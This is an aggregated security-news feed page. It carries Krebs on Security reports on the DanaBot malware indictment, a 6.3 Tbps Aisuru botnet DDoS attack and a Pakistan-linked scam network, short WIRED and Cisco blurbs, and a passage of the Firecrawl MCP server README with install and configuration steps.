Notably absent from this month’s patch batch is a fix for a newly discovered weakness in Windows Server 2025 that allows attackers to act with the privileges of any user in Active Directory. The bug, dubbed “BadSuccessor,” was publicly disclosed by researchers at Akamai on May 21, and several public proof-of-concepts are now available. Tenable’s Satnam Narang said organizations that have at least one Windows Server 2025 domain controller should review permissions for principals and limit those permissions as much as possible.

Adobe has released updates for Acrobat Reader and six other products addressing at least 259 vulnerabilities, most of them in an update for Experience Manager. Mozilla Firefox and Google Chrome both recently released security updates that require a restart of the browser to take effect. The latest Chrome update fixes two zero-day exploits in the browser (CVE-2025-5419 and CVE-2025-4664).

For a detailed breakdown on the individual security updates released by Microsoft today, check out the Patch Tuesday roundup from the SANS Internet Storm Center. Action 1 has a breakdown of patches from Microsoft and a raft of other software vendors releasing fixes this month. As always, please back up your system and/or data before patching, and feel free to drop a note in the comments if you run into any problems applying these updates.

☐ ☆ ✇ WIRED

Cybercriminals Are Hiding Malicious Web Traffic in Plain Sight

By: Lily Hay Newman — June 6th 2025 at 19:05
In an effort to evade detection, cybercriminals are increasingly turning to “residential proxy” services that cover their tracks by making it look like everyday online activity.
☐ ☆ ✇ WIRED

What Really Happened in the Aftermath of the Lizard Squad Hacks

By: Joe Tidy — June 5th 2025 at 10:00
On Christmas Day in 2014 hackers knocked out the Xbox and PlayStation gaming networks, impacting how video game companies handled cybersecurity for years.
☐ ☆ ✇ Krebs on Security

Oops: DanaBot Malware Devs Infected Their Own PCs

By: BrianKrebs — May 22nd 2025 at 21:53

The U.S. government today unsealed criminal charges against 16 individuals accused of operating and selling DanaBot, a prolific strain of information-stealing malware that has been sold on Russian cybercrime forums since 2018. The FBI says a newer version of DanaBot was used for espionage, and that many of the defendants exposed their real-life identities after accidentally infecting their own systems with the malware.

DanaBot’s features, as promoted on its support site. Image: welivesecurity.com.

Initially spotted in May 2018 by researchers at the email security firm Proofpoint, DanaBot is a malware-as-a-service platform that specializes in credential theft and banking fraud.

Today, the U.S. Department of Justice unsealed a criminal complaint and indictment from 2022, which said the FBI identified at least 40 affiliates who were paying between $3,000 and $4,000 a month for access to the information stealer platform.

The government says the malware infected more than 300,000 systems globally, causing estimated losses of more than $50 million. The ringleaders of the DanaBot conspiracy are named as Aleksandr Stepanov, 39, a.k.a. “JimmBee,” and Artem Aleksandrovich Kalinkin, 34, a.k.a. “Onix”, both of Novosibirsk, Russia. Kalinkin is an IT engineer for the Russian state-owned energy giant Gazprom. His Facebook profile name is “Maffiozi.”

According to the FBI, there were at least two major versions of DanaBot; the first was sold between 2018 and June 2020, when the malware stopped being offered on Russian cybercrime forums. The government alleges that the second version of DanaBot — emerging in January 2021 — was provided to co-conspirators for use in targeting military, diplomatic and non-governmental organization computers in several countries, including the United States, Belarus, the United Kingdom, Germany, and Russia.

“Unindicted co-conspirators would use the Espionage Variant to compromise computers around the world and steal sensitive diplomatic communications, credentials, and other data from these targeted victims,” reads a grand jury indictment dated Sept. 20, 2022. “This stolen data included financial transactions by diplomatic staff, correspondence concerning day-to-day diplomatic activity, as well as summaries of a particular country’s interactions with the United States.”

The indictment says the FBI in 2022 seized servers used by the DanaBot authors to control their malware, as well as the servers that stored stolen victim data. The government said the server data also show numerous instances in which the DanaBot defendants infected their own PCs, resulting in their credential data being uploaded to stolen data repositories that were seized by the feds.

“In some cases, such self-infections appeared to be deliberately done in order to test, analyze, or improve the malware,” the criminal complaint reads. “In other cases, the infections seemed to be inadvertent – one of the hazards of committing cybercrime is that criminals will sometimes infect themselves with their own malware by mistake.”

Image: welivesecurity.com

A statement from the DOJ says that as part of today’s operation, agents with the Defense Criminal Investigative Service (DCIS) seized the DanaBot control servers, including dozens of virtual servers hosted in the United States. The government says it is now working with industry partners to notify DanaBot victims and help remediate infections. The statement credits a number of security firms with providing assistance to the government, including ESET, Flashpoint, Google, Intel 471, Lumen, PayPal, Proofpoint, Team CYMRU, and ZScaler.

It’s not unheard of for financially-oriented malicious software to be repurposed for espionage. A variant of the ZeuS Trojan, which was used in countless online banking attacks against companies in the United States and Europe between 2007 and at least 2015, was for a time diverted to espionage tasks by its author.

As detailed in this 2015 story, the author of the ZeuS trojan created a custom version of the malware to serve purely as a spying machine, which scoured infected systems in Ukraine for specific keywords in emails and documents that would likely only be found in classified documents.

The public charging of the 16 DanaBot defendants comes a day after Microsoft joined a slew of tech companies in disrupting the IT infrastructure for another malware-as-a-service offering — Lumma Stealer, which is likewise offered to affiliates under tiered subscription prices ranging from $250 to $1,000 per month. Separately, Microsoft filed a civil lawsuit to seize control over 2,300 domain names used by Lumma Stealer and its affiliates.

Further reading:

Danabot: Analyzing a Fallen Empire

ZScaler blog: DanaBot Launches DDoS Attack Against the Ukrainian Ministry of Defense

Flashpoint: Operation Endgame DanaBot Malware

Team CYMRU: Inside DanaBot’s Infrastructure: In Support of Operation Endgame II

March 2022 criminal complaint v. Artem Aleksandrovich Kalinkin

September 2022 grand jury indictment naming the 16 defendants

☐ ☆ ✇ Krebs on Security

KrebsOnSecurity Hit With Near-Record 6.3 Tbps DDoS

By: BrianKrebs — May 20th 2025 at 21:30

KrebsOnSecurity last week was hit by a near record distributed denial-of-service (DDoS) attack that clocked in at more than 6.3 terabits of data per second (a terabit is one trillion bits of data). The brief attack appears to have been a test run for a massive new Internet of Things (IoT) botnet capable of launching crippling digital assaults that few web destinations can withstand. Read on for more about the botnet, the attack, and the apparent creator of this global menace.

For reference, the 6.3 Tbps attack last week was ten times the size of the assault launched against this site in 2016 by the Mirai IoT botnet, which held KrebsOnSecurity offline for nearly four days. The 2016 assault was so large that Akamai – which was providing pro-bono DDoS protection for KrebsOnSecurity at the time — asked me to leave their service because the attack was causing problems for their paying customers.

Since the Mirai attack, KrebsOnSecurity.com has been behind the protection of Project Shield, a free DDoS defense service that Google provides to websites offering news, human rights, and election-related content. Google Security Engineer Damian Menscher told KrebsOnSecurity the May 12 attack was the largest Google has ever handled. In terms of sheer size, it is second only to a very similar attack that Cloudflare mitigated and wrote about in April.

After comparing notes with Cloudflare, Menscher said the botnet that launched both attacks bears the fingerprints of Aisuru, a digital siege machine that first surfaced less than a year ago. Menscher said the attack on KrebsOnSecurity lasted less than a minute, hurling large UDP data packets at random ports at a rate of approximately 585 million data packets per second.

“It was the type of attack normally designed to overwhelm network links,” Menscher said, referring to the throughput connections between and among various Internet service providers (ISPs). “For most companies, this size of attack would kill them.”

A graph depicting the 6.5 Tbps attack mitigated by Cloudflare in April 2025. Image: Cloudflare.

The Aisuru botnet comprises a globally-dispersed collection of hacked IoT devices, including routers, digital video recorders and other systems that are commandeered via default passwords or software vulnerabilities. As documented by researchers at QiAnXin XLab, the botnet was first identified in an August 2024 attack on a large gaming platform.

Aisuru reportedly went quiet after that exposure, only to reappear in November with even more firepower and software exploits. In a January 2025 report, XLab found the new and improved Aisuru (a.k.a. “Airashi“) had incorporated a previously unknown zero-day vulnerability in Cambium Networks cnPilot routers.

NOT FORKING AROUND

The people behind the Aisuru botnet have been peddling access to their DDoS machine in public Telegram chat channels that are closely monitored by multiple security firms. In August 2024, the botnet was rented out in subscription tiers ranging from $150 per day to $600 per week, offering attacks of up to two terabits per second.

“You may not attack any measurement walls, healthcare facilities, schools or government sites,” read a notice posted on Telegram by the Aisuru botnet owners in August 2024.

Interested parties were told to contact the Telegram handle “@yfork” to purchase a subscription. The account @yfork previously used the nickname “Forky,” an identity that has been posting to public DDoS-focused Telegram channels since 2021.

According to the FBI, Forky’s DDoS-for-hire domains have been seized in multiple law enforcement operations over the years. Last year, Forky said on Telegram he was selling the domain stresser[.]best, which saw its servers seized by the FBI in 2022 as part of an ongoing international law enforcement effort aimed at diminishing the supply of and demand for DDoS-for-hire services.

“The operator of this service, who calls himself ‘Forky,’ operates a Telegram channel to advertise features and communicate with current and prospective DDoS customers,” reads an FBI seizure warrant (PDF) issued for stresser[.]best. The FBI warrant stated that on the same day the seizures were announced, Forky posted a link to a story on this blog that detailed the domain seizure operation, adding the comment, “We are buying our new domains right now.”

A screenshot from the FBI’s seizure warrant for Forky’s DDoS-for-hire domains shows Forky announcing the resurrection of their service at new domains.

Approximately ten hours later, Forky posted again, including a screenshot of the stresser[.]best user dashboard, instructing customers to use their saved passwords for the old website on the new one.

A review of Forky’s posts to public Telegram channels — as indexed by the cyber intelligence firms Unit 221B and Flashpoint — reveals a 21-year-old individual who claims to reside in Brazil [full disclosure: Flashpoint is currently an advertiser on this blog].

Since late 2022, Forky’s posts have frequently promoted a DDoS mitigation company and ISP that he operates called botshield[.]io. The Botshield website is connected to a business entity registered in the United Kingdom called Botshield LTD, which lists a 21-year-old woman from Sao Paulo, Brazil as the director. Internet routing records indicate Botshield (AS213613) currently controls several hundred Internet addresses that were allocated to the company earlier this year.

Domaintools.com reports that botshield[.]io was registered in July 2022 to a Kaike Southier Leite in Sao Paulo. A LinkedIn profile by the same name says this individual is a network specialist from Brazil who works in “the planning and implementation of robust network infrastructures, with a focus on security, DDoS mitigation, colocation and cloud server services.”

MEET FORKY

Image: Jaclyn Vernace / Shutterstock.com.

In his posts to public Telegram chat channels, Forky has hardly attempted to conceal his whereabouts or identity. In countless chat conversations indexed by Unit 221B, Forky could be seen talking about everyday life in Brazil, often remarking on the extremely low or high prices in Brazil for a range of goods, from computer and networking gear to narcotics and food.

Reached via Telegram, Forky claimed he was “not involved in this type of illegal actions for years now,” and that the project had been taken over by other unspecified developers. Forky initially told KrebsOnSecurity he had been out of the botnet scene for years, only to concede this wasn’t true when presented with public posts on Telegram from late last year that clearly showed otherwise.

Forky denied being involved in the attack on KrebsOnSecurity, but acknowledged that he helped to develop and market the Aisuru botnet. Forky claims he is now merely a staff member for the Aisuru botnet team, and that he stopped running the botnet roughly two months ago after starting a family. Forky also said the woman named as director of Botshield is related to him.

Forky offered equivocal, evasive responses to a number of questions about the Aisuru botnet and his business endeavors. But on one point he was crystal clear:

“I have zero fear about you, the FBI, or Interpol,” Forky said, asserting that he is now almost entirely focused on their hosting business — Botshield.

Forky declined to discuss the makeup of his ISP’s clientele, or to clarify whether Botshield was more of a hosting provider or a DDoS mitigation firm. However, Forky has posted on Telegram about Botshield successfully mitigating large DDoS attacks launched against other DDoS-for-hire services.

DomainTools finds the same Sao Paulo street address in the registration records for botshield[.]io was used to register several other domains, including cant-mitigate[.]us. The email address in the WHOIS records for that domain is forkcontato@gmail.com, which DomainTools says was used to register the domain for the now-defunct DDoS-for-hire service stresser[.]us, one of the domains seized in the FBI’s 2023 crackdown.

On May 8, 2023, the U.S. Department of Justice announced the seizure of stresser[.]us, along with a dozen other domains offering DDoS services. The DOJ said ten of the 13 domains were reincarnations of services that were seized during a prior sweep in December, which targeted 48 top stresser services (also known as “booters”).

Forky claimed he could find out who attacked my site with Aisuru. But when pressed a day later on the question, Forky said he’d come up empty-handed.

“I tried to ask around, all the big guys are not retarded enough to attack you,” Forky explained in an interview on Telegram. “I didn’t have anything to do with it. But you are welcome to write the story and try to put the blame on me.”

THE GHOST OF MIRAI

The 6.3 Tbps attack last week caused no visible disruption to this site, in part because it was so brief — lasting approximately 45 seconds. DDoS attacks of such magnitude and brevity typically are produced when botnet operators wish to test or demonstrate their firepower for the benefit of potential buyers. Indeed, Google’s Menscher said it is likely that both the May 12 attack and the slightly larger 6.5 Tbps attack against Cloudflare last month were simply tests of the same botnet’s capabilities.

In many ways, the threat posed by the Aisuru/Airashi botnet is reminiscent of Mirai, an innovative IoT malware strain that emerged in the summer of 2016 and successfully out-competed virtually all other IoT malware strains in existence at the time.

As first revealed by KrebsOnSecurity in January 2017, the Mirai authors were two U.S. men who co-ran a DDoS mitigation service — even as they were selling far more lucrative DDoS-for-hire services using the most powerful botnet on the planet.

Less than a week after the Mirai botnet was used in a days-long DDoS against KrebsOnSecurity, the Mirai authors published the source code to their botnet so that they would not be the only ones in possession of it in the event of their arrest by federal investigators.

Ironically, the leaking of the Mirai source is precisely what led to the eventual unmasking and arrest of the Mirai authors, who went on to serve probation sentences that required them to consult with FBI investigators on DDoS investigations. But that leak also rapidly led to the creation of dozens of Mirai botnet clones, many of which were harnessed to fuel their own powerful DDoS-for-hire services.

Menscher told KrebsOnSecurity that as counterintuitive as it may sound, the Internet as a whole would probably be better off if the source code for Aisuru became public knowledge. After all, he said, the people behind Aisuru are in constant competition with other IoT botnet operators who are all striving to commandeer a finite number of vulnerable IoT devices globally.

Such a development would almost certainly cause a proliferation of Aisuru botnet clones, he said, but at least then the overall firepower from each individual botnet would be greatly diminished — or at least within range of the mitigation capabilities of most DDoS protection providers.

Barring a source code leak, Menscher said, it would be nice if someone published the full list of software exploits being used by the Aisuru operators to grow their botnet so quickly.

“Part of the reason Mirai was so dangerous was that it effectively took out competing botnets,” he said. “This attack somehow managed to compromise all these boxes that nobody else knows about. Ideally, we’d want to see that fragmented out, so that no [individual botnet operator] controls too much.”

☐ ☆ ✇ Security – Cisco Blog

Simplifying Zero Trust: How Cisco Security Suites Drive Value

By: Jennifer Golden — May 20th 2025 at 12:00
Discover how Cisco Security Suites are helping organizations achieve zero trust while realizing significant cost savings, improved productivity, and a 110% ROI.
☐ ☆ ✇ WIRED

What to Expect When You’re Convicted

By: Elana Klein — May 20th 2025 at 10:00
When a formerly incarcerated “troubleshooter for the mafia” looked for a second career he chose the thing he knew best. He became a prison consultant for white-collar criminals.
☐ ☆ ✇ Security – Cisco Blog

Developing With Cisco XDR at Cisco Live San Diego ‘25

By: Christopher Van Der Made — May 19th 2025 at 12:00
Join us at Cisco Live San Diego to explore Cisco XDR’s latest innovations, including custom integrations, AI automation, and community features. Don’t miss out!
☐ ☆ ✇ WIRED

US Customs and Border Protection Plans to Photograph Everyone Exiting the US by Car

By: Caroline Haskins — May 9th 2025 at 17:12
A CBP spokesperson tells WIRED that the agency plans to expand its program for real-time face recognition at the border, potentially aiding Trump administration efforts to track people who self-deport.
☐ ☆ ✇ Krebs on Security

Pakistani Firm Shipped Fentanyl Analogs, Scams to US

By: BrianKrebs — May 7th 2025 at 22:22

A Texas firm recently charged with conspiring to distribute synthetic opioids in the United States is at the center of a vast network of companies in the U.S. and Pakistan whose employees are accused of using online ads to scam westerners seeking help with trademarks, book writing, mobile app development and logo designs, a new investigation reveals.

In an indictment (PDF) unsealed last month, the U.S. Department of Justice said Dallas-based eWorldTrade “operated an online business-to-business marketplace that facilitated the distribution of synthetic opioids such as isotonitazene and carfentanyl, both significantly more potent than fentanyl.”

Launched in 2017, eWorldTrade[.]com now features a seizure notice from the DOJ. eWorldTrade operated as a wholesale seller of consumer goods, including clothes, machinery, chemicals, automobiles and appliances. The DOJ’s indictment includes no additional details about eWorldTrade’s business, origins or other activity, and at first glance the website might appear to be a legitimate e-commerce platform that also just happened to sell some restricted chemicals.

A screenshot of the eWorldTrade homepage on March 25, 2025. Image: archive.org.

However, an investigation into the company’s founders reveals they are connected to a sprawling network of websites that have a history of extortionate scams involving trademark registration, book publishing, exam preparation, and the design of logos, mobile applications and websites.

Records from the U.S. Patent and Trademark Office (USPTO) show the eWorldTrade mark is owned by an Azneem Bilwani in Karachi (this name also is in the registration records for the now-seized eWorldTrade domain). Mr. Bilwani is perhaps better known as the director of the Pakistan-based IT provider Abtach Ltd., which has been singled out by the USPTO and Google for operating trademark registration scams (the main offices for eWorldtrade and Abtach share the same address in Pakistan).

In November 2021, the USPTO accused Abtach of perpetrating “an egregious scheme to deceive and defraud applicants for federal trademark registrations by improperly altering official USPTO correspondence, overcharging application filing fees, misappropriating the USPTO’s trademarks, and impersonating the USPTO.”

Abtach offered trademark registration at suspiciously low prices compared to legitimate costs of over USD $1,500, and claimed they could register a trademark in 24 hours. Abtach reportedly rebranded to Intersys Limited after the USPTO banned Abtach from filing any more trademark applications.

In a note published to its LinkedIn profile, Intersys Ltd. asserted last year that certain scam firms in Karachi were impersonating the company.

FROM AXACT TO ABTACH

Many of Abtach’s employees are former associates of a similar company in Pakistan called Axact that was targeted by Pakistani authorities in a 2015 fraud investigation. Axact came under law enforcement scrutiny after The New York Times ran a front-page story about the company’s most lucrative scam business: Hundreds of sites peddling fake college degrees and diplomas.

People who purchased fake certifications were subsequently blackmailed by Axact employees posing as government officials, who would demand additional payments under threats of prosecution or imprisonment for having bought fraudulent “unauthorized” academic degrees. This practice created a continuous cycle of extortion, internally referred to as “upselling.”

“Axact took money from at least 215,000 people in 197 countries — one-third of them from the United States,” The Times reported. “Sales agents wielded threats and false promises and impersonated government officials, earning the company at least $89 million in its final year of operation.”

Dozens of top Axact employees were arrested, jailed, held for months, tried and sentenced to seven years for various fraud violations. But a 2019 research brief on Axact’s diploma mills found none of those convicted had started their prison sentence, and that several had fled Pakistan and never returned.

“In October 2016, a Pakistan district judge acquitted 24 Axact officials at trial due to ‘not enough evidence’ and then later admitted he had accepted a bribe (of $35,209) from Axact,” reads a history (PDF) published by the American Association of Collegiate Registrars and Admissions Officers.

In 2021, Pakistan’s Federal Investigation Agency (FIA) charged Bilwani and nearly four dozen others — many of them Abtach employees — with running an elaborate trademark scam. The authorities called it “the biggest money laundering case in the history of Pakistan,” and named a number of businesses based in Texas that allegedly helped move the proceeds of cybercrime.

A page from the March 2021 FIA report alleging that Digitonics Labs and Abtach employees conspired to extort and defraud consumers.

The FIA said the defendants operated a large number of websites offering low-cost trademark services to customers, before then “ignoring them after getting the funds and later demanding more funds from clients/victims in the name of up-sale (extortion).” The Pakistani law enforcement agency said that about 75 percent of customers received fake or fabricated trademarks as a result of the scams.

The FIA found Abtach operates in conjunction with a Karachi firm called Digitonics Labs, which earned a monthly revenue of around $2.5 million through the “extortion of international clients in the name of up-selling, the sale of fake/fabricated USPTO certificates, and the maintaining of phishing websites.”

According the Pakistani authorities, the accused also ran countless scams involving ebook publication and logo creation, wherein customers are subjected to advance-fee fraud and extortion — with the scammers demanding more money for supposed “copyright release” and threatening to release the trademark.

Also charged by the FIA was Junaid Mansoor, the owner of Digitonics Labs in Karachi. Mansoor’s U.K.-registered company Maple Solutions Direct Limited has run at least 700 ads for logo design websites since 2015, the Google Ads Transparency page reports. The company has approximately 88 ads running on Google as of today. 

Junaid Mansoor. Source: youtube/@Olevels․com School.

Mr. Mansoor is actively involved with and promoting a Quran study business called quranmasteronline[.]com, which was founded by Junaid’s brother Qasim Mansoor (Qasim is also named in the FIA criminal investigation). The Google ads promoting quranmasteronline[.]com were paid for by the same account advertising a number of scam websites selling logo and web design services. 

Junaid Mansoor did not respond to requests for comment. An address in Teaneck, New Jersey where Mr. Mansoor previously lived is listed as an official address of exporthub[.]com, a Pakistan-based e-commerce website that appears remarkably similar to eWorldTrade (Exporthub says its offices are in Texas). Interestingly, a search in Google for this domain shows ExportHub currently features multiple listings for fentanyl citrate from suppliers in China and elsewhere.

The CEO of Digitonics Labs is Muhammad Burhan Mirza, a former Axact official who was arrested by the FIA as part of its money laundering and trademark fraud investigation in 2021. In 2023, prosecutors in Pakistan charged Mirza, Mansoor and 14 other Digitonics employees with fraud, impersonating government officials, phishing, cheating and extortion. Mirza’s LinkedIn profile says he currently runs an educational technology/life coach enterprise called TheCoach360, which purports to help young kids “achieve financial independence.”

Reached via LinkedIn, Mr. Mirza denied having anything to do with eWorldTrade or any of its sister companies in Texas.

“Moreover, I have no knowledge as to the companies you have mentioned,” said Mr. Mirza, who did not respond to follow-up questions.

The current disposition of the FIA’s fraud case against the defendants is unclear. The investigation was marred early on by allegations of corruption and bribery. In 2021, Pakistani authorities alleged Bilwani paid a six-figure bribe to FIA investigators. Meanwhile, attorneys for Mr. Bilwani have argued that although their client did pay a bribe, the payment was solicited by government officials. Mr. Bilwani did not respond to requests for comment.

THE TEXAS NEXUS

KrebsOnSecurity has learned that the people and entities at the center of the FIA investigations have built a significant presence in the United States, with a strong concentration in Texas. The Texas businesses promote websites that sell logo and web design, ghostwriting, and academic cheating services. Many of these entities have recently been sued for fraud and breach of contract by angry former customers, who claimed the companies relentlessly upsold them while failing to produce the work as promised.

For example, the FIA complaints named Retrocube LLC and 360 Digital Marketing LLC, two entities that share a street address with eWorldTrade: 1910 Pacific Avenue, Suite 8025, Dallas, Texas. Also incorporated at that Pacific Avenue address is abtach[.]ae, a web design and marketing firm based in Dubai; and intersyslimited[.]com, the new name of Abtach after they were banned by the USPTO. Other businesses registered at this address market services for logo design, mobile app development, and ghostwriting.

A list published in 2021 by Pakistan’s FIA of different front companies allegedly involved in scamming people who are looking for help with trademarks, ghostwriting, logos and web design.

360 Digital Marketing’s website 360digimarketing[.]com is owned by an Abtach front company called Abtech LTD. Meanwhile, business records show 360 Digi Marketing LTD is a U.K. company whose officers include former Abtach director Bilwani; Muhammad Saad Iqbal, formerly Abtach, now CEO of Intersys Ltd; Niaz Ahmed, a former Abtach associate; and Muhammad Salman Yousuf, formerly a vice president at Axact, Abtach, and Digitonics Labs.

Google’s Ads Transparency Center finds 360 Digital Marketing LLC ran at least 500 ads promoting various websites selling ghostwriting services . Another entity tied to Junaid Mansoor — a company called Octa Group Technologies AU — has run approximately 300 Google ads for book publishing services, promoting confusingly named websites like amazonlistinghub[.]com and barnesnoblepublishing[.]co.

360 Digital Marketing LLC ran approximately 500 ads for scam ghostwriting sites.

Rameez Moiz is a Texas resident and former Abtach product manager who has represented 360 Digital Marketing LLC and RetroCube. Moiz told KrebsOnSecurity he stopped working for 360 Digital Marketing in the summer of 2023. Mr. Moiz did not respond to follow-up questions, but an Upwork profile for him states that as of April 2025 he is employed by Dallas-based Vertical Minds LLC.

In April 2025, California resident Melinda Will sued the Texas firm Majestic Ghostwriting — which is doing business as ghostwritingsquad[.]com —  alleging they scammed her out of $100,000 after she hired them to help write her book. Google’s ad transparency page shows Moiz’s employer Vertical Minds LLC paid to run approximately 55 ads for ghostwritingsquad[.]com and related sites.

Google’s ad transparency listing for ghostwriting ads paid for by Vertical Minds LLC.

VICTIMS SPEAK OUT

Ms. Will’s lawsuit is just one of more than two dozen complaints over the past four years wherein plaintiffs sued one of this group’s web design, wiki editing or ghostwriting services. In 2021, a New Jersey man sued Octagroup Technologies, alleging they ripped him off when he paid a total of more than $26,000 for the design and marketing of a web-based mapping service.

The plaintiff in that case did not respond to requests for comment, but his complaint alleges Octagroup and a myriad other companies it contracted with produced minimal work product despite subjecting him to relentless upselling. That case was decided in favor of the plaintiff because the defendants never contested the matter in court.

In 2023, 360 Digital Marketing LLC and Retrocube LLC were sued by a woman who said they scammed her out of $40,000 over a book she wanted help writing. That lawsuit helpfully showed an image of the office front door at 1910 Pacific Ave Suite 8025, which featured the logos of 360 Digital Marketing, Retrocube, and eWorldTrade.

The front door at 1910 Pacific Avenue, Suite 8025, Dallas, Texas.

The lawsuit was filed pro se by Leigh Riley, a 64-year-old career IT professional who paid 360 Digital Marketing to have a company called Talented Ghostwriter co-author and promote a series of books she’d outlined on spirituality and healing.

“The main reason I hired them was because I didn’t understand what I call the formula for writing a book, and I know there’s a lot of marketing that goes into publishing,” Riley explained in an interview. “I know nothing about that stuff, and these guys were convincing that they could handle all aspects of it. Until I discovered they couldn’t write a damn sentence in English properly.”

Riley’s well-documented lawsuit (not linked here because it features a great deal of personal information) includes screenshots of conversations with the ghostwriting team, which was constantly assigning her to new writers and editors, and ghosting her on scheduled conference calls about progress on the project. Riley said she ended up writing most of the book herself because the work they produced was unusable.

“Finally after months of promising the books were printed and on their way, they show up at my doorstep with the wrong title on the book,” Riley said. When she demanded her money back, she said the people helping her with the website to promote the book locked her out of the site.

A conversation snippet from Leigh Riley’s lawsuit against Talented Ghostwriter, aka 360 Digital Marketing LLC. “Other companies once they have you money they don’t even respond or do anything,” the ghostwriting team manager explained.

Riley decided to sue, naming 360 Digital Marketing LLC and Retrocube LLC, among others.  The companies offered to settle the matter for $20,000, which she accepted. “I didn’t have money to hire a lawyer, and I figured it was time to cut my losses,” she said.

Riley said she could have saved herself a great deal of headache by doing some basic research on Talented Ghostwriter, whose website claims the company is based in Los Angeles. According to the California Secretary of State, however, there is no registered entity by that name. Rather, the address claimed by talentedghostwriter[.]com is a vacant office building with a “space available” sign in the window.

California resident Walter Horsting discovered something similar when he sued 360 Digital Marketing in small claims court last year, after hiring a company called Vox Ghostwriting to help write, edit and promote a spy novel he’d been working on. Horsting said he paid Vox $3,300 to ghostwrite a 280-page book, and was upsold an Amazon marketing and publishing package for $7,500.

In an interview, Horsting said the prose that Vox Ghostwriting produced was “juvenile at best,” forcing him to rewrite and edit the work himself, and to partner with a graphical artist to produce illustrations. Horsting said that when it came time to begin marketing the novel, Vox Ghostwriting tried to further upsell him on marketing packages, while dodging scheduled meetings with no follow-up.

“They have a money back guarantee, and when they wouldn’t refund my money I said I’m taking you to court,” Horsting recounted. “I tried to serve them in Los Angeles but found no such office exists. I talked to a salon next door and they said someone else had recently shown up desperately looking for where the ghostwriting company went, and it appears there are a trail of corpses on this. I finally tracked down where they are in Texas.”

It was the same office that Ms. Riley served her lawsuit against. Horsting said he has a court hearing scheduled later this month, but he’s under no illusions that winning the case means he’ll be able to collect.

“At this point, I’m doing it out of pride more than actually expecting anything to come to good fortune for me,” he said.

The following mind map was helpful in piecing together key events, individuals and connections mentioned above. It’s important to note that this graphic only scratches the surface of the operations tied to this group. For example, in Case 2 we can see mention of academic cheating services, wherein people can be hired to take online proctored exams on one’s behalf. Those who hire these services soon find themselves subject to impersonation and blackmail attempts for larger and larger sums of money, with the threat of publicly exposing their unethical academic cheating activity.

A “mind map” illustrating the connections between and among entities referenced in this story. Click to enlarge.

GOOGLE RESPONDS

KrebsOnSecurity reviewed the Google Ad Transparency links for nearly 500 different websites tied to this network of ghostwriting, logo, app and web development businesses. Those website names were then fed into spyfu.com, a competitive intelligence company that tracks the reach and performance of advertising keywords. Spyfu estimates that between April 2023 and April 2025, those websites spent more than $10 million on Google ads.

Reached for comment, Google said in a written statement that it is constantly policing its ad network for bad actors, pointing to an ads safety report (PDF) showing Google blocked or removed 5.1 billion bad ads last year — including more than 500 million ads related to trademarks.

“Our policy against Enabling Dishonest Behavior prohibits products or services that help users mislead others, including ads for paper-writing or exam-taking services,” the statement reads. “When we identify ads or advertisers that violate our policies, we take action, including by suspending advertiser accounts, disapproving ads, and restricting ads to specific domains when appropriate.”

Google did not respond to specific questions about the advertising entities mentioned in this story, saying only that “we are actively investigating this matter and addressing any policy violations, including suspending advertiser accounts when appropriate.”

From reviewing the ad accounts that have been promoting these scam websites, it appears Google has very recently acted to remove a large number of the offending ads. Prior to my notifying Google about the extent of this ad network on April 28, the Google Ad Transparency network listed over 500 ads for 360 Digital Marketing; as of this publication, that number had dwindled to 10.

On April 30, Google announced that starting this month its ads transparency page will display the payment profile name as the payer name for verified advertisers, if that name differs from their verified advertiser name. Searchengineland.com writes the changes are aimed at increasing accountability in digital advertising.

This spreadsheet lists the domain names, advertiser names, and Google Ad Transparency links for more than 350 entities offering ghostwriting, publishing, web design and academic cheating services.

KrebsOnSecurity would like to thank the anonymous security researcher NatInfoSec for their assistance in this investigation.

For further reading on Abtach and its myriad companies in all of the above-mentioned verticals (ghostwriting, logo design, etc.), see this Wikiwand entry.

☐ ☆ ✇ KitPloit - PenTest Tools!

Firecrawl-Mcp-Server - Official Firecrawl MCP Server - Adds Powerful Web Scraping To Cursor, Claude And Any Other LLM Clients

By: Unknown — May 6th 2025 at 12:30


A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.

Big thanks to @vrknetha, @cawstudios for the initial implementation!

You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.

 

Features

  • Scrape, crawl, search, extract, deep research and batch scrape support
  • Web scraping with JS rendering
  • URL discovery and crawling
  • Web search with content extraction
  • Automatic retries with exponential backoff
  • Efficient batch processing with built-in rate limiting
  • Credit usage monitoring for cloud API
  • Comprehensive logging system
  • Support for cloud and self-hosted Firecrawl instances
  • Mobile/Desktop viewport support
  • Smart content filtering with tag inclusion/exclusion

Installation

Running with npx

env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp

Manual Installation

npm install -g firecrawl-mcp

Running on Cursor

Configuring Cursor 🖥️ Note: Requires Cursor version 0.45.6+ For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide

To configure Firecrawl MCP in Cursor v0.45.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add New MCP Server"
  4. Enter the following:
  5. Name: "firecrawl-mcp" (or your preferred name)
  6. Type: "command"
  7. Command: env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp

To configure Firecrawl MCP in Cursor v0.48.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add new global MCP server"
  4. Enter the following code: json { "mcpServers": { "firecrawl-mcp": { "command": "npx", "args": ["-y", "firecrawl-mcp"], "env": { "FIRECRAWL_API_KEY": "YOUR-API-KEY" } } } }

If you are using Windows and are running into issues, try cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"

Replace your-api-key with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys

After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.

Running on Windsurf

Add this to your ./codeium/windsurf/model_config.json:

{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY"
}
}
}
}

Installing via Smithery (Legacy)

To install Firecrawl for Claude Desktop automatically via Smithery:

npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude

Configuration

Environment Variables

Required for Cloud API

  • FIRECRAWL_API_KEY: Your Firecrawl API key
  • Required when using cloud API (default)
